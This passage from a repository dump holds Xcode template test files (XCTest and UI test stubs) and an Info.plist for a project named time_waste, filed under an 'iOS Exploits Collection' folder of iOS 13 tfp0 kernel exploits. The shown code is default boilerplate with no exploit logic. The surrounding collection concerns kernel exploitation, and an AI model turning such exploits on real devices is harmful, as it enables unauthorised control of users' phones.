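    // Put teardown code here. This method is called after the invocation of each test method in the class.
}

- (void)testExample {
    // This is an example of a functional test case.
    // Use XCTAssert and related functions to verify your tests produce the correct results.
}

- (void)testPerformanceExample {
    // This is an example of a performance test case.
    [self measureBlock:^{
        // Put the code you want to measure the time of here.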
34 | }]; 35 | } 36 | 37 | @end 38 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteUITests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | $(PRODUCT_BUNDLE_PACKAGE_TYPE) 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_wasteUITests/time_wasteUITests.m: -------------------------------------------------------------------------------- 1 | // 2 | // time_wasteUITests.m 3 | // time_wasteUITests 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface time_wasteUITests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation time_wasteUITests 16 | 17 | - (void)setUp { 18 | // Put setup code here. This method is called before the invocation of each test method in the class. 19 | 20 | // In UI tests it is usually best to stop immediately when a failure occurs. 21 | self.continueAfterFailure = NO; 22 | 23 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this. 24 | } 25 | 26 | - (void)tearDown { 27 | // Put teardown code here. This method is called after the invocation of each test method in the class. 28 | } 29 | 30 | - (void)testExample { 31 | // UI tests must launch the application that they test. 
32 | XCUIApplication *app = [[XCUIApplication alloc] init]; 33 | [app launch]; 34 | 35 | // Use recording to get started writing UI tests. 36 | // Use XCTAssert and related functions to verify your tests produce the correct results. 37 | } 38 | 39 | - (void)testLaunchPerformance { 40 | if (@available(macOS 10.15, iOS 13.0, tvOS 13.0, *)) { 41 | // This measures how long it takes to launch your application. 42 | [self measureWithMetrics:@[XCTOSSignpostMetric.applicationLaunchMetric] block:^{ 43 | [[[XCUIApplication alloc] init] launch]; 44 | }]; 45 | } 46 | } 47 | 48 | @end 49 | --------------------------------------------------------------------------------